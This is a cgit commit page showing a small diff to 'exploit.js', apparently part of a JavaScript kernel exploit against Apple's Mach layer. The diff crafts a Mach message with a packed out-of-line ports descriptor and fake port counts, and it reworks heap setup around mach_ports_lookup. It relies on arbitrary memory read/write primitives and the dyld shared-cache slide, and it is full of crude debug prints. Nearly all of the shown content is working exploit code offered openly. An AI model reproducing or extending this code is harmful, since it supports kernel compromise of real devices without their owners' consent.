summaryrefslogtreecommitdiff
path: root/src/js/kexp
diff options
context:
space:
mode:
authorspv420 <spv@spv.sh>2022-07-15 15:03:50 -0400
committerspv420 <spv@spv.sh>2022-07-15 15:03:50 -0400
commit42647b796f0f54122e7f46522d8e681825daf54b (patch)
tree6886bfea221b15579b84ff13d1b850a1ac9f5fcf /src/js/kexp
parentd1da310f02adc0e9b5f8656ea063fd3231901611 (diff)
dump
Diffstat (limited to 'src/js/kexp')
-rwxr-xr-xsrc/js/kexp/exploit.js8
1 files changed, 5 insertions, 3 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 8447c46..473bc6e 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
+ write_u32(InP + 0x24, 0x0213c600);
write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
write_u32(InP + 0x30, fake_count);
@@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) {
function mach_ports_lookup_shit() {
printf("fuck\n");
var arrz = shit_heap(4);
+ var arrz2 = shit_heap(4);
printf("fuck\n");
- write_u32(arrz, 0);
+ write_u32(arrz, arrz2);
+ write_u32(arrz2, 0);
printf("fuck\n");
var sz = shit_heap(4);;
printf("fuck\n");
@@ -359,6 +361,7 @@ function mach_ports_lookup_shit() {
// var mts = mach_task_self();
printf("fuck\n");
calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
printf("mpl success\n");
return read_u32(read_u32(arrz) + 8);
@@ -461,7 +464,6 @@ again: while (true) {
// while (true) {
//
// }
- scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
printf("fuck\n");
// var fake_port = read_u32(read_u32(arrz) + 8);
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 22:01:19 +0000